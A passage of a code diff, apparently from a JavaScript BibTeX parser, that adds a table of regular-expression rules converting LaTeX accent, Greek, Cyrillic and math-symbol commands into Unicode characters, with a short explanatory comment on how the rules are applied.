+ [/\\v\{e\}/g, '\u011B'], + [/\\\^\{G\}/g, '\u011C'], + [/\\\^\{g\}/g, '\u011D'], + [/\\u\{G\}/g, '\u011E'], + [/\\u\{g\}/g, '\u011F'], + [/\\.\{G\}/g, '\u0120'], + [/\\.\{g\}/g, '\u0121'], + [/\\c\{G\}/g, '\u0122'], + [/\\c\{g\}/g, '\u0123'], + [/\\\^\{H\}/g, '\u0124'], + [/\\\^\{h\}/g, '\u0125'], + [/\\Elzxh /g, '\u0127'], + [/\\~\{I\}/g, '\u0128'], + [/\\~\{\\i\}/g, '\u0129'], + [/\\=\{I\}/g, '\u012A'], + [/\\=\{\\i\}/g, '\u012B'], + [/\\u\{I\}/g, '\u012C'], + [/\\u\{\\i\}/g, '\u012D'], + [/\\k\{I\}/g, '\u012E'], + [/\\k\{i\}/g, '\u012F'], + [/\\.\{I\}/g, '\u0130'], + [/\\i /g, '\u0131'], + [/\\\^\{J\}/g, '\u0134'], + [/\\\^\{\\j\}/g, '\u0135'], + [/\\c\{K\}/g, '\u0136'], + [/\\c\{k\}/g, '\u0137'], + [/\\'\{L\}/g, '\u0139'], + [/\\'\{l\}/g, '\u013A'], + [/\\c\{L\}/g, '\u013B'], + [/\\c\{l\}/g, '\u013C'], + [/\\v\{L\}/g, '\u013D'], + [/\\v\{l\}/g, '\u013E'], + [/\\L /g, '\u0141'], + [/\\l /g, '\u0142'], + [/\\'\{N\}/g, '\u0143'], + [/\\'\{n\}/g, '\u0144'], + [/\\c\{N\}/g, '\u0145'], + [/\\c\{n\}/g, '\u0146'], + [/\\v\{N\}/g, '\u0147'], + [/\\v\{n\}/g, '\u0148'], + [/\\NG /g, '\u014A'], + [/\\ng /g, '\u014B'], + [/\\=\{O\}/g, '\u014C'], + [/\\=\{o\}/g, '\u014D'], + [/\\u\{O\}/g, '\u014E'], + [/\\u\{o\}/g, '\u014F'], + [/\\H\{O\}/g, '\u0150'], + [/\\H\{o\}/g, '\u0151'], + [/\\OE /g, '\u0152'], + [/\\oe /g, '\u0153'], + [/\\'\{R\}/g, '\u0154'], + [/\\'\{r\}/g, '\u0155'], + [/\\c\{R\}/g, '\u0156'], + [/\\c\{r\}/g, '\u0157'], + [/\\v\{R\}/g, '\u0158'], + [/\\v\{r\}/g, '\u0159'], + [/\\'\{S\}/g, '\u015A'], + [/\\'\{s\}/g, '\u015B'], + [/\\\^\{S\}/g, '\u015C'], + 
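+  // NOTE (editor annotation, not part of the original source): each
+  // [regexp, replacement] pair in this table is applied in processEntry_ as
+  // raw.replace(re, rep). For example, the rule [/\\'\{e\}/g, '\u00E9'] above
+  // rewrites the raw field text "Caf\'{e}" to "Café" before the remaining
+  // braces and backslashes are stripped from the value.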
[/\\\^\{s\}/g, '\u015D'], + [/\\c\{S\}/g, '\u015E'], + [/\\c\{s\}/g, '\u015F'], + [/\\v\{S\}/g, '\u0160'], + [/\\v\{s\}/g, '\u0161'], + [/\\c\{T\}/g, '\u0162'], + [/\\c\{t\}/g, '\u0163'], + [/\\v\{T\}/g, '\u0164'], + [/\\v\{t\}/g, '\u0165'], + [/\\~\{U\}/g, '\u0168'], + [/\\~\{u\}/g, '\u0169'], + [/\\=\{U\}/g, '\u016A'], + [/\\=\{u\}/g, '\u016B'], + [/\\u\{U\}/g, '\u016C'], + [/\\u\{u\}/g, '\u016D'], + [/\\r\{U\}/g, '\u016E'], + [/\\r\{u\}/g, '\u016F'], + [/\\H\{U\}/g, '\u0170'], + [/\\H\{u\}/g, '\u0171'], + [/\\k\{U\}/g, '\u0172'], + [/\\k\{u\}/g, '\u0173'], + [/\\\^\{W\}/g, '\u0174'], + [/\\\^\{w\}/g, '\u0175'], + [/\\\^\{Y\}/g, '\u0176'], + [/\\\^\{y\}/g, '\u0177'], + [/\\"\{Y\}/g, '\u0178'], + [/\\'\{Z\}/g, '\u0179'], + [/\\'\{z\}/g, '\u017A'], + [/\\.\{Z\}/g, '\u017B'], + [/\\.\{z\}/g, '\u017C'], + [/\\v\{Z\}/g, '\u017D'], + [/\\v\{z\}/g, '\u017E'], + [/\\texthvlig /g, '\u0195'], + [/\\textnrleg /g, '\u019E'], + [/\\eth /g, '\u01AA'], + [/\\textdoublepipe /g, '\u01C2'], + [/\\'\{g\}/g, '\u01F5'], + [/\\Elztrna /g, '\u0250'], + [/\\Elztrnsa /g, '\u0252'], + [/\\Elzopeno /g, '\u0254'], + [/\\Elzrtld /g, '\u0256'], + [/\\Elzschwa /g, '\u0259'], + [/\\varepsilon /g, '\u025B'], + [/\\Elzpgamma /g, '\u0263'], + [/\\Elzpbgam /g, '\u0264'], + [/\\Elztrnh /g, '\u0265'], + [/\\Elzbtdl /g, '\u026C'], + [/\\Elzrtll /g, '\u026D'], + [/\\Elztrnm /g, '\u026F'], + [/\\Elztrnmlr /g, '\u0270'], + [/\\Elzltlmr /g, '\u0271'], + [/\\Elzltln /g, '\u0272'], + [/\\Elzrtln /g, '\u0273'], + [/\\Elzclomeg /g, '\u0277'], + [/\\textphi /g, '\u0278'], + [/\\Elztrnr /g, '\u0279'], + [/\\Elztrnrl /g, '\u027A'], + [/\\Elzrttrnr /g, '\u027B'], + [/\\Elzrl /g, '\u027C'], + [/\\Elzrtlr /g, '\u027D'], + [/\\Elzfhr /g, '\u027E'], + [/\\Elzrtls /g, '\u0282'], + [/\\Elzesh /g, '\u0283'], + [/\\Elztrnt /g, '\u0287'], + [/\\Elzrtlt /g, '\u0288'], + [/\\Elzpupsil /g, '\u028A'], + [/\\Elzpscrv /g, '\u028B'], + [/\\Elzinvv /g, '\u028C'], + [/\\Elzinvw /g, '\u028D'], + [/\\Elztrny /g, '\u028E'], + [/\\Elzrtlz /g, '\u0290'], + [/\\Elzyogh /g, '\u0292'], + [/\\Elzglst /g, '\u0294'], + [/\\Elzreglst /g, '\u0295'], + [/\\Elzinglst /g, '\u0296'], + [/\\textturnk /g, '\u029E'], + [/\\Elzdyogh /g, '\u02A4'], + [/\\Elztesh /g, '\u02A7'], + [/\\textasciicaron /g, '\u02C7'], + [/\\Elzverts /g, '\u02C8'], + [/\\Elzverti /g, '\u02CC'], + [/\\Elzlmrk /g, '\u02D0'], + [/\\Elzhlmrk /g, '\u02D1'], + [/\\Elzsbrhr /g, '\u02D2'], + [/\\Elzsblhr /g, '\u02D3'], + [/\\Elzrais /g, '\u02D4'], + [/\\Elzlow /g, '\u02D5'], + [/\\textasciibreve /g, '\u02D8'], + [/\\textperiodcentered /g, '\u02D9'], + [/\\r\{\}/g, '\u02DA'], + [/\\k\{\}/g, '\u02DB'], + [/\\texttildelow /g, '\u02DC'], + [/\\H\{\}/g, '\u02DD'], + [/\\tone\{55\}/g, '\u02E5'], + [/\\tone\{44\}/g, '\u02E6'], + [/\\tone\{33\}/g, '\u02E7'], + [/\\tone\{22\}/g, '\u02E8'], + [/\\tone\{11\}/g, '\u02E9'], + [/\\cyrchar\\C/g, '\u030F'], + [/\\Elzpalh /g, '\u0321'], + [/\\Elzrh /g, '\u0322'], + [/\\Elzsbbrg /g, '\u032A'], + [/\\Elzxl /g, '\u0335'], + [/\\Elzbar /g, '\u0336'], + [/\\'\{A\}/g, '\u0386'], + [/\\'\{E\}/g, '\u0388'], + [/\\'\{H\}/g, '\u0389'], + [/\\'\{\}\{I\}/g, '\u038A'], + [/\\'\{\}O/g, '\u038C'], + [/\\mathrm\{'Y\}/g, '\u038E'], + [/\\mathrm\{'\\Omega\}/g, '\u038F'], + [/\\acute\{\\ddot\{\\iota\}\}/g, '\u0390'], + [/\\Alpha /g, '\u0391'], + [/\\Beta /g, '\u0392'], + [/\\Gamma /g, '\u0393'], + [/\\Delta /g, '\u0394'], + [/\\Epsilon /g, '\u0395'], + [/\\Zeta /g, '\u0396'], + [/\\Eta /g, '\u0397'], + [/\\Theta /g, '\u0398'], + [/\\Iota /g, '\u0399'], + [/\\Kappa /g, '\u039A'], + [/\\Lambda 
/g, '\u039B'], + [/\\Xi /g, '\u039E'], + [/\\Pi /g, '\u03A0'], + [/\\Rho /g, '\u03A1'], + [/\\Sigma /g, '\u03A3'], + [/\\Tau /g, '\u03A4'], + [/\\Upsilon /g, '\u03A5'], + [/\\Phi /g, '\u03A6'], + [/\\Chi /g, '\u03A7'], + [/\\Psi /g, '\u03A8'], + [/\\Omega /g, '\u03A9'], + [/\\mathrm\{\\ddot\{I\}\}/g, '\u03AA'], + [/\\mathrm\{\\ddot\{Y\}\}/g, '\u03AB'], + [/\\'\{\$\\alpha\$\}/g, '\u03AC'], + [/\\acute\{\\epsilon\}/g, '\u03AD'], + [/\\acute\{\\eta\}/g, '\u03AE'], + [/\\acute\{\\iota\}/g, '\u03AF'], + [/\\acute\{\\ddot\{\\upsilon\}\}/g, '\u03B0'], + [/\\alpha /g, '\u03B1'], + [/\\beta /g, '\u03B2'], + [/\\gamma /g, '\u03B3'], + [/\\delta /g, '\u03B4'], + [/\\epsilon /g, '\u03B5'], + [/\\zeta /g, '\u03B6'], + [/\\eta /g, '\u03B7'], + [/\\texttheta /g, '\u03B8'], + [/\\iota /g, '\u03B9'], + [/\\kappa /g, '\u03BA'], + [/\\lambda /g, '\u03BB'], + [/\\mu /g, '\u03BC'], + [/\\nu /g, '\u03BD'], + [/\\xi /g, '\u03BE'], + [/\\pi /g, '\u03C0'], + [/\\rho /g, '\u03C1'], + [/\\varsigma /g, '\u03C2'], + [/\\sigma /g, '\u03C3'], + [/\\tau /g, '\u03C4'], + [/\\upsilon /g, '\u03C5'], + [/\\varphi /g, '\u03C6'], + [/\\chi /g, '\u03C7'], + [/\\psi /g, '\u03C8'], + [/\\omega /g, '\u03C9'], + [/\\ddot\{\\iota\}/g, '\u03CA'], + [/\\ddot\{\\upsilon\}/g, '\u03CB'], + [/\\'\{o\}/g, '\u03CC'], + [/\\acute\{\\upsilon\}/g, '\u03CD'], + [/\\acute\{\\omega\}/g, '\u03CE'], + [/\\Pisymbol\{ppi022\}\{87\}/g, '\u03D0'], + [/\\textvartheta /g, '\u03D1'], + [/\\Upsilon /g, '\u03D2'], + [/\\phi /g, '\u03D5'], + [/\\varpi /g, '\u03D6'], + [/\\Stigma /g, '\u03DA'], + [/\\Digamma /g, '\u03DC'], + [/\\digamma /g, '\u03DD'], + [/\\Koppa /g, '\u03DE'], + [/\\Sampi /g, '\u03E0'], + [/\\varkappa /g, '\u03F0'], + [/\\varrho /g, '\u03F1'], + [/\\textTheta /g, '\u03F4'], + [/\\backepsilon /g, '\u03F6'], + [/\\cyrchar\\CYRYO /g, '\u0401'], + [/\\cyrchar\\CYRDJE /g, '\u0402'], + [/\\cyrchar\{\\'\\CYRG\}/g, '\u0403'], + [/\\cyrchar\\CYRIE /g, '\u0404'], + [/\\cyrchar\\CYRDZE /g, '\u0405'], + [/\\cyrchar\\CYRII /g, '\u0406'], + [/\\cyrchar\\CYRYI /g, '\u0407'], + [/\\cyrchar\\CYRJE /g, '\u0408'], + [/\\cyrchar\\CYRLJE /g, '\u0409'], + [/\\cyrchar\\CYRNJE /g, '\u040A'], + [/\\cyrchar\\CYRTSHE /g, '\u040B'], + [/\\cyrchar\{\\'\\CYRK\}/g, '\u040C'], + [/\\cyrchar\\CYRUSHRT /g, '\u040E'], + [/\\cyrchar\\CYRDZHE /g, '\u040F'], + [/\\cyrchar\\CYRA /g, '\u0410'], + [/\\cyrchar\\CYRB /g, '\u0411'], + [/\\cyrchar\\CYRV /g, '\u0412'], + [/\\cyrchar\\CYRG /g, '\u0413'], + [/\\cyrchar\\CYRD /g, '\u0414'], + [/\\cyrchar\\CYRE /g, '\u0415'], + [/\\cyrchar\\CYRZH /g, '\u0416'], + [/\\cyrchar\\CYRZ /g, '\u0417'], + [/\\cyrchar\\CYRI /g, '\u0418'], + [/\\cyrchar\\CYRISHRT /g, '\u0419'], + [/\\cyrchar\\CYRK /g, '\u041A'], + [/\\cyrchar\\CYRL /g, '\u041B'], + [/\\cyrchar\\CYRM /g, '\u041C'], + [/\\cyrchar\\CYRN /g, '\u041D'], + [/\\cyrchar\\CYRO /g, '\u041E'], + [/\\cyrchar\\CYRP /g, '\u041F'], + [/\\cyrchar\\CYRR /g, '\u0420'], + [/\\cyrchar\\CYRS /g, '\u0421'], + [/\\cyrchar\\CYRT /g, '\u0422'], + [/\\cyrchar\\CYRU /g, '\u0423'], + [/\\cyrchar\\CYRF /g, '\u0424'], + [/\\cyrchar\\CYRH /g, '\u0425'], + [/\\cyrchar\\CYRC /g, '\u0426'], + [/\\cyrchar\\CYRCH /g, '\u0427'], + [/\\cyrchar\\CYRSH /g, '\u0428'], + [/\\cyrchar\\CYRSHCH /g, '\u0429'], + [/\\cyrchar\\CYRHRDSN /g, '\u042A'], + [/\\cyrchar\\CYRERY /g, '\u042B'], + [/\\cyrchar\\CYRSFTSN /g, '\u042C'], + [/\\cyrchar\\CYREREV /g, '\u042D'], + [/\\cyrchar\\CYRYU /g, '\u042E'], + [/\\cyrchar\\CYRYA /g, '\u042F'], + [/\\cyrchar\\cyra /g, '\u0430'], + [/\\cyrchar\\cyrb /g, '\u0431'], + [/\\cyrchar\\cyrv /g, 
'\u0432'], + [/\\cyrchar\\cyrg /g, '\u0433'], + [/\\cyrchar\\cyrd /g, '\u0434'], + [/\\cyrchar\\cyre /g, '\u0435'], + [/\\cyrchar\\cyrzh /g, '\u0436'], + [/\\cyrchar\\cyrz /g, '\u0437'], + [/\\cyrchar\\cyri /g, '\u0438'], + [/\\cyrchar\\cyrishrt /g, '\u0439'], + [/\\cyrchar\\cyrk /g, '\u043A'], + [/\\cyrchar\\cyrl /g, '\u043B'], + [/\\cyrchar\\cyrm /g, '\u043C'], + [/\\cyrchar\\cyrn /g, '\u043D'], + [/\\cyrchar\\cyro /g, '\u043E'], + [/\\cyrchar\\cyrp /g, '\u043F'], + [/\\cyrchar\\cyrr /g, '\u0440'], + [/\\cyrchar\\cyrs /g, '\u0441'], + [/\\cyrchar\\cyrt /g, '\u0442'], + [/\\cyrchar\\cyru /g, '\u0443'], + [/\\cyrchar\\cyrf /g, '\u0444'], + [/\\cyrchar\\cyrh /g, '\u0445'], + [/\\cyrchar\\cyrc /g, '\u0446'], + [/\\cyrchar\\cyrch /g, '\u0447'], + [/\\cyrchar\\cyrsh /g, '\u0448'], + [/\\cyrchar\\cyrshch /g, '\u0449'], + [/\\cyrchar\\cyrhrdsn /g, '\u044A'], + [/\\cyrchar\\cyrery /g, '\u044B'], + [/\\cyrchar\\cyrsftsn /g, '\u044C'], + [/\\cyrchar\\cyrerev /g, '\u044D'], + [/\\cyrchar\\cyryu /g, '\u044E'], + [/\\cyrchar\\cyrya /g, '\u044F'], + [/\\cyrchar\\cyryo /g, '\u0451'], + [/\\cyrchar\\cyrdje /g, '\u0452'], + [/\\cyrchar\{\\'\\cyrg\}/g, '\u0453'], + [/\\cyrchar\\cyrie /g, '\u0454'], + [/\\cyrchar\\cyrdze /g, '\u0455'], + [/\\cyrchar\\cyrii /g, '\u0456'], + [/\\cyrchar\\cyryi /g, '\u0457'], + [/\\cyrchar\\cyrje /g, '\u0458'], + [/\\cyrchar\\cyrlje /g, '\u0459'], + [/\\cyrchar\\cyrnje /g, '\u045A'], + [/\\cyrchar\\cyrtshe /g, '\u045B'], + [/\\cyrchar\{\\'\\cyrk\}/g, '\u045C'], + [/\\cyrchar\\cyrushrt /g, '\u045E'], + [/\\cyrchar\\cyrdzhe /g, '\u045F'], + [/\\cyrchar\\CYROMEGA /g, '\u0460'], + [/\\cyrchar\\cyromega /g, '\u0461'], + [/\\cyrchar\\CYRYAT /g, '\u0462'], + [/\\cyrchar\\CYRIOTE /g, '\u0464'], + [/\\cyrchar\\cyriote /g, '\u0465'], + [/\\cyrchar\\CYRLYUS /g, '\u0466'], + [/\\cyrchar\\cyrlyus /g, '\u0467'], + [/\\cyrchar\\CYRIOTLYUS /g, '\u0468'], + [/\\cyrchar\\cyriotlyus /g, '\u0469'], + [/\\cyrchar\\CYRBYUS /g, '\u046A'], + [/\\cyrchar\\CYRIOTBYUS /g, '\u046C'], + [/\\cyrchar\\cyriotbyus /g, '\u046D'], + [/\\cyrchar\\CYRKSI /g, '\u046E'], + [/\\cyrchar\\cyrksi /g, '\u046F'], + [/\\cyrchar\\CYRPSI /g, '\u0470'], + [/\\cyrchar\\cyrpsi /g, '\u0471'], + [/\\cyrchar\\CYRFITA /g, '\u0472'], + [/\\cyrchar\\CYRIZH /g, '\u0474'], + [/\\cyrchar\\CYRUK /g, '\u0478'], + [/\\cyrchar\\cyruk /g, '\u0479'], + [/\\cyrchar\\CYROMEGARND /g, '\u047A'], + [/\\cyrchar\\cyromegarnd /g, '\u047B'], + [/\\cyrchar\\CYROMEGATITLO /g, '\u047C'], + [/\\cyrchar\\cyromegatitlo /g, '\u047D'], + [/\\cyrchar\\CYROT /g, '\u047E'], + [/\\cyrchar\\cyrot /g, '\u047F'], + [/\\cyrchar\\CYRKOPPA /g, '\u0480'], + [/\\cyrchar\\cyrkoppa /g, '\u0481'], + [/\\cyrchar\\cyrthousands /g, '\u0482'], + [/\\cyrchar\\cyrhundredthousands /g, '\u0488'], + [/\\cyrchar\\cyrmillions /g, '\u0489'], + [/\\cyrchar\\CYRSEMISFTSN /g, '\u048C'], + [/\\cyrchar\\cyrsemisftsn /g, '\u048D'], + [/\\cyrchar\\CYRRTICK /g, '\u048E'], + [/\\cyrchar\\cyrrtick /g, '\u048F'], + [/\\cyrchar\\CYRGUP /g, '\u0490'], + [/\\cyrchar\\cyrgup /g, '\u0491'], + [/\\cyrchar\\CYRGHCRS /g, '\u0492'], + [/\\cyrchar\\cyrghcrs /g, '\u0493'], + [/\\cyrchar\\CYRGHK /g, '\u0494'], + [/\\cyrchar\\cyrghk /g, '\u0495'], + [/\\cyrchar\\CYRZHDSC /g, '\u0496'], + [/\\cyrchar\\cyrzhdsc /g, '\u0497'], + [/\\cyrchar\\CYRZDSC /g, '\u0498'], + [/\\cyrchar\\cyrzdsc /g, '\u0499'], + [/\\cyrchar\\CYRKDSC /g, '\u049A'], + [/\\cyrchar\\cyrkdsc /g, '\u049B'], + [/\\cyrchar\\CYRKVCRS /g, '\u049C'], + [/\\cyrchar\\cyrkvcrs /g, '\u049D'], + [/\\cyrchar\\CYRKHCRS /g, '\u049E'], + 
[/\\cyrchar\\cyrkhcrs /g, '\u049F'], + [/\\cyrchar\\CYRKBEAK /g, '\u04A0'], + [/\\cyrchar\\cyrkbeak /g, '\u04A1'], + [/\\cyrchar\\CYRNDSC /g, '\u04A2'], + [/\\cyrchar\\cyrndsc /g, '\u04A3'], + [/\\cyrchar\\CYRNG /g, '\u04A4'], + [/\\cyrchar\\cyrng /g, '\u04A5'], + [/\\cyrchar\\CYRPHK /g, '\u04A6'], + [/\\cyrchar\\cyrphk /g, '\u04A7'], + [/\\cyrchar\\CYRABHHA /g, '\u04A8'], + [/\\cyrchar\\cyrabhha /g, '\u04A9'], + [/\\cyrchar\\CYRSDSC /g, '\u04AA'], + [/\\cyrchar\\cyrsdsc /g, '\u04AB'], + [/\\cyrchar\\CYRTDSC /g, '\u04AC'], + [/\\cyrchar\\cyrtdsc /g, '\u04AD'], + [/\\cyrchar\\CYRY /g, '\u04AE'], + [/\\cyrchar\\cyry /g, '\u04AF'], + [/\\cyrchar\\CYRYHCRS /g, '\u04B0'], + [/\\cyrchar\\cyryhcrs /g, '\u04B1'], + [/\\cyrchar\\CYRHDSC /g, '\u04B2'], + [/\\cyrchar\\cyrhdsc /g, '\u04B3'], + [/\\cyrchar\\CYRTETSE /g, '\u04B4'], + [/\\cyrchar\\cyrtetse /g, '\u04B5'], + [/\\cyrchar\\CYRCHRDSC /g, '\u04B6'], + [/\\cyrchar\\cyrchrdsc /g, '\u04B7'], + [/\\cyrchar\\CYRCHVCRS /g, '\u04B8'], + [/\\cyrchar\\cyrchvcrs /g, '\u04B9'], + [/\\cyrchar\\CYRSHHA /g, '\u04BA'], + [/\\cyrchar\\cyrshha /g, '\u04BB'], + [/\\cyrchar\\CYRABHCH /g, '\u04BC'], + [/\\cyrchar\\cyrabhch /g, '\u04BD'], + [/\\cyrchar\\CYRABHCHDSC /g, '\u04BE'], + [/\\cyrchar\\cyrabhchdsc /g, '\u04BF'], + [/\\cyrchar\\CYRpalochka /g, '\u04C0'], + [/\\cyrchar\\CYRKHK /g, '\u04C3'], + [/\\cyrchar\\cyrkhk /g, '\u04C4'], + [/\\cyrchar\\CYRNHK /g, '\u04C7'], + [/\\cyrchar\\cyrnhk /g, '\u04C8'], + [/\\cyrchar\\CYRCHLDSC /g, '\u04CB'], + [/\\cyrchar\\cyrchldsc /g, '\u04CC'], + [/\\cyrchar\\CYRAE /g, '\u04D4'], + [/\\cyrchar\\cyrae /g, '\u04D5'], + [/\\cyrchar\\CYRSCHWA /g, '\u04D8'], + [/\\cyrchar\\cyrschwa /g, '\u04D9'], + [/\\cyrchar\\CYRABHDZE /g, '\u04E0'], + [/\\cyrchar\\cyrabhdze /g, '\u04E1'], + [/\\cyrchar\\CYROTLD /g, '\u04E8'], + [/\\cyrchar\\cyrotld /g, '\u04E9'], + [/\\hspace\{0.6em\}/g, '\u2002'], + [/\\hspace\{1em\}/g, '\u2003'], + [/\\hspace\{0.33em\}/g, '\u2004'], + [/\\hspace\{0.25em\}/g, '\u2005'], + [/\\hspace\{0.166em\}/g, '\u2006'], + [/\\hphantom\{0\}/g, '\u2007'], + [/\\hphantom\{,\}/g, '\u2008'], + [/\\hspace\{0.167em\}/g, '\u2009'], + [/\\mkern1mu /g, '\u200A'], + [/\\textendash /g, '\u2013'], + [/\\textemdash /g, '\u2014'], + [/\\rule\{1em\}\{1pt\}/g, '\u2015'], + [/\\Vert /g, '\u2016'], + [/\\Elzreapos /g, '\u201B'], + [/\\textquotedblleft /g, '\u201C'], + [/\\textquotedblright /g, '\u201D'], + [/\\textdagger /g, '\u2020'], + [/\\textdaggerdbl /g, '\u2021'], + [/\\textbullet /g, '\u2022'], + [/\\ldots /g, '\u2026'], + [/\\textperthousand /g, '\u2030'], + [/\\textpertenthousand /g, '\u2031'], + [/\\backprime /g, '\u2035'], + [/\\guilsinglleft /g, '\u2039'], + [/\\guilsinglright /g, '\u203A'], + [/\\mkern4mu /g, '\u205F'], + [/\\nolinebreak /g, '\u2060'], + [/\\ensuremath\{\\Elzpes\}/g, '\u20A7'], + [/\\mbox\{\\texteuro\} /g, '\u20AC'], + [/\\dddot /g, '\u20DB'], + [/\\ddddot /g, '\u20DC'], + [/\\mathbb\{C\}/g, '\u2102'], + [/\\mathscr\{g\}/g, '\u210A'], + [/\\mathscr\{H\}/g, '\u210B'], + [/\\mathfrak\{H\}/g, '\u210C'], + [/\\mathbb\{H\}/g, '\u210D'], + [/\\hslash /g, '\u210F'], + [/\\mathscr\{I\}/g, '\u2110'], + [/\\mathfrak\{I\}/g, '\u2111'], + [/\\mathscr\{L\}/g, '\u2112'], + [/\\mathscr\{l\}/g, '\u2113'], + [/\\mathbb\{N\}/g, '\u2115'], + [/\\cyrchar\\textnumero /g, '\u2116'], + [/\\wp /g, '\u2118'], + [/\\mathbb\{P\}/g, '\u2119'], + [/\\mathbb\{Q\}/g, '\u211A'], + [/\\mathscr\{R\}/g, '\u211B'], + [/\\mathfrak\{R\}/g, '\u211C'], + [/\\mathbb\{R\}/g, '\u211D'], + [/\\Elzxrat /g, '\u211E'], + [/\\texttrademark /g, '\u2122'], + 
[/\\mathbb\{Z\}/g, '\u2124'], + [/\\Omega /g, '\u2126'], + [/\\mho /g, '\u2127'], + [/\\mathfrak\{Z\}/g, '\u2128'], + [/\\ElsevierGlyph\{2129\}/g, '\u2129'], + [/\\AA /g, '\u212B'], + [/\\mathscr\{B\}/g, '\u212C'], + [/\\mathfrak\{C\}/g, '\u212D'], + [/\\mathscr\{e\}/g, '\u212F'], + [/\\mathscr\{E\}/g, '\u2130'], + [/\\mathscr\{F\}/g, '\u2131'], + [/\\mathscr\{M\}/g, '\u2133'], + [/\\mathscr\{o\}/g, '\u2134'], + [/\\aleph /g, '\u2135'], + [/\\beth /g, '\u2136'], + [/\\gimel /g, '\u2137'], + [/\\daleth /g, '\u2138'], + [/\\textfrac\{1\}\{3\}/g, '\u2153'], + [/\\textfrac\{2\}\{3\}/g, '\u2154'], + [/\\textfrac\{1\}\{5\}/g, '\u2155'], + [/\\textfrac\{2\}\{5\}/g, '\u2156'], + [/\\textfrac\{3\}\{5\}/g, '\u2157'], + [/\\textfrac\{4\}\{5\}/g, '\u2158'], + [/\\textfrac\{1\}\{6\}/g, '\u2159'], + [/\\textfrac\{5\}\{6\}/g, '\u215A'], + [/\\textfrac\{1\}\{8\}/g, '\u215B'], + [/\\textfrac\{3\}\{8\}/g, '\u215C'], + [/\\textfrac\{5\}\{8\}/g, '\u215D'], + [/\\textfrac\{7\}\{8\}/g, '\u215E'], + [/\\leftarrow /g, '\u2190'], + [/\\uparrow /g, '\u2191'], + [/\\rightarrow /g, '\u2192'], + [/\\downarrow /g, '\u2193'], + [/\\leftrightarrow /g, '\u2194'], + [/\\updownarrow /g, '\u2195'], + [/\\nwarrow /g, '\u2196'], + [/\\nearrow /g, '\u2197'], + [/\\searrow /g, '\u2198'], + [/\\swarrow /g, '\u2199'], + [/\\nleftarrow /g, '\u219A'], + [/\\nrightarrow /g, '\u219B'], + [/\\arrowwaveright /g, '\u219C'], + [/\\arrowwaveright /g, '\u219D'], + [/\\twoheadleftarrow /g, '\u219E'], + [/\\twoheadrightarrow /g, '\u21A0'], + [/\\leftarrowtail /g, '\u21A2'], + [/\\rightarrowtail /g, '\u21A3'], + [/\\mapsto /g, '\u21A6'], + [/\\hookleftarrow /g, '\u21A9'], + [/\\hookrightarrow /g, '\u21AA'], + [/\\looparrowleft /g, '\u21AB'], + [/\\looparrowright /g, '\u21AC'], + [/\\leftrightsquigarrow /g, '\u21AD'], + [/\\nleftrightarrow /g, '\u21AE'], + [/\\Lsh /g, '\u21B0'], + [/\\Rsh /g, '\u21B1'], + [/\\ElsevierGlyph\{21B3\}/g, '\u21B3'], + [/\\curvearrowleft /g, '\u21B6'], + [/\\curvearrowright /g, '\u21B7'], + [/\\circlearrowleft /g, '\u21BA'], + [/\\circlearrowright /g, '\u21BB'], + [/\\leftharpoonup /g, '\u21BC'], + [/\\leftharpoondown /g, '\u21BD'], + [/\\upharpoonright /g, '\u21BE'], + [/\\upharpoonleft /g, '\u21BF'], + [/\\rightharpoonup /g, '\u21C0'], + [/\\rightharpoondown /g, '\u21C1'], + [/\\downharpoonright /g, '\u21C2'], + [/\\downharpoonleft /g, '\u21C3'], + [/\\rightleftarrows /g, '\u21C4'], + [/\\dblarrowupdown /g, '\u21C5'], + [/\\leftrightarrows /g, '\u21C6'], + [/\\leftleftarrows /g, '\u21C7'], + [/\\upuparrows /g, '\u21C8'], + [/\\rightrightarrows /g, '\u21C9'], + [/\\downdownarrows /g, '\u21CA'], + [/\\leftrightharpoons /g, '\u21CB'], + [/\\rightleftharpoons /g, '\u21CC'], + [/\\nLeftarrow /g, '\u21CD'], + [/\\nLeftrightarrow /g, '\u21CE'], + [/\\nRightarrow /g, '\u21CF'], + [/\\Leftarrow /g, '\u21D0'], + [/\\Uparrow /g, '\u21D1'], + [/\\Rightarrow /g, '\u21D2'], + [/\\Downarrow /g, '\u21D3'], + [/\\Leftrightarrow /g, '\u21D4'], + [/\\Updownarrow /g, '\u21D5'], + [/\\Lleftarrow /g, '\u21DA'], + [/\\Rrightarrow /g, '\u21DB'], + [/\\rightsquigarrow /g, '\u21DD'], + [/\\DownArrowUpArrow /g, '\u21F5'], + [/\\forall /g, '\u2200'], + [/\\complement /g, '\u2201'], + [/\\partial /g, '\u2202'], + [/\\exists /g, '\u2203'], + [/\\nexists /g, '\u2204'], + [/\\varnothing /g, '\u2205'], + [/\\nabla /g, '\u2207'], + [/\\in /g, '\u2208'], + [/\\not\\in /g, '\u2209'], + [/\\ni /g, '\u220B'], + [/\\not\\ni /g, '\u220C'], + [/\\prod /g, '\u220F'], + [/\\coprod /g, '\u2210'], + [/\\sum /g, '\u2211'], + [/\\mp /g, '\u2213'], + [/\\dotplus 
/g, '\u2214'], + [/\\setminus /g, '\u2216'], + [/\\circ /g, '\u2218'], + [/\\bullet /g, '\u2219'], + [/\\surd /g, '\u221A'], + [/\\propto /g, '\u221D'], + [/\\infty /g, '\u221E'], + [/\\rightangle /g, '\u221F'], + [/\\angle /g, '\u2220'], + [/\\measuredangle /g, '\u2221'], + [/\\sphericalangle /g, '\u2222'], + [/\\mid /g, '\u2223'], + [/\\nmid /g, '\u2224'], + [/\\parallel /g, '\u2225'], + [/\\nparallel /g, '\u2226'], + [/\\wedge /g, '\u2227'], + [/\\vee /g, '\u2228'], + [/\\cap /g, '\u2229'], + [/\\cup /g, '\u222A'], + [/\\int /g, '\u222B'], + [/\\int\\!\\int /g, '\u222C'], + [/\\int\\!\\int\\!\\int /g, '\u222D'], + [/\\oint /g, '\u222E'], + [/\\surfintegral /g, '\u222F'], + [/\\volintegral /g, '\u2230'], + [/\\clwintegral /g, '\u2231'], + [/\\ElsevierGlyph\{2232\}/g, '\u2232'], + [/\\ElsevierGlyph\{2233\}/g, '\u2233'], + [/\\therefore /g, '\u2234'], + [/\\because /g, '\u2235'], + [/\\Colon /g, '\u2237'], + [/\\ElsevierGlyph\{2238\}/g, '\u2238'], + [/\\mathbin\{\{:\}\\!\\!\{\-\}\\!\\!\{:\}\}/g, '\u223A'], + [/\\homothetic /g, '\u223B'], + [/\\sim /g, '\u223C'], + [/\\backsim /g, '\u223D'], + [/\\lazysinv /g, '\u223E'], + [/\\wr /g, '\u2240'], + [/\\not\\sim /g, '\u2241'], + [/\\ElsevierGlyph\{2242\}/g, '\u2242'], + [/\\NotEqualTilde 